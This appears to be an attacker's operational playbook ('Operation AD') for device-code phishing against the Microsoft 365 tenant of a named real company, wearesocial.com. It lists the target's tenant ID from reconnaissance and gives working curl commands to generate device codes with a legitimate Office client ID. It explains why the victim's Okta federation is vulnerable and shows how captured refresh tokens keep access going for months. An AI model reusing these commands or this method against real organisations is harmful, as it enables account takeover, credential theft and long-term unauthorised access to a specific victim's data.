# M365 Device Code Generation & Token Duration
# Operation AD - wearesocial.com
# Date: 2026-01-23

================================================================================
                         CODE GENERATION
================================================================================

We use their domain directly in Microsoft's public OAuth endpoint.

## Using their domain (wearesocial.com):
curl -s -X POST "https://login.microsoftonline.com/wearesocial.com/oauth2/v2.0/devicecode" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "scope=https://graph.microsoft.com/.default offline_access"

## Using their tenant ID:
curl -s -X POST "https://login.microsoftonline.com/c444fffe-2181-46e8-ad79-6da1c731c973/oauth2/v2.0/devicecode" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "scope=https://graph.microsoft.com/.default offline_access"

## What we have from recon:
- M365 Tenant ID: c444fffe-2181-46e8-ad79-6da1c731c973
- Domain: wearesocial.com
- Client ID: d3590ed6-52b3-4102-aeff-aad2292ab01c (Microsoft Office - public)

This endpoint is PUBLICLY ACCESSIBLE - no auth needed to generate codes.

================================================================================
                         TOKEN DURATION
================================================================================

| Token          | Duration        | Notes                              |
|----------------|-----------------|-----------------------------------|
| Device Code    | 15 minutes      | Must be entered before expiry     |
| Access Token   | 1 hour          | Direct API access                 |
| Refresh Token  | 90 days - 1 year| Can generate new access tokens    |

================================================================================
                         PERSISTENCE
================================================================================

With refresh token, we can generate NEW ACCESS TOKENS INDEFINITELY.

Refresh tokens only expire if:
- User changes password
- Admin revokes the token
- 90 days of inactivity
- Organization policy forces expiry

EFFECTIVE ACCESS: MONTHS with refresh token saved.

================================================================================
                       WHY THIS WORKS
================================================================================

1. Microsoft's device code endpoint is public
2. We use a LEGITIMATE Microsoft client_id (Office app)
3. Victim authenticates through REAL Microsoft site
4. Microsoft trusts their federated Okta
5. Okta has NO phishing-resistant MFA (pssoEnabled: false)
6. We receive valid tokens after victim completes auth

================================================================================
                    REFRESH TOKEN USAGE
================================================================================

## Generate new access token anytime:
curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
  -d "grant_type=refresh_token" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "refresh_token=$REFRESH_TOKEN" \
  -d "scope=https://graph.microsoft.com/.default"

## CRITICAL: Save refresh token immediately after capture!
echo "$REFRESH_TOKEN" > refresh_token_backup.txt

================================================================================
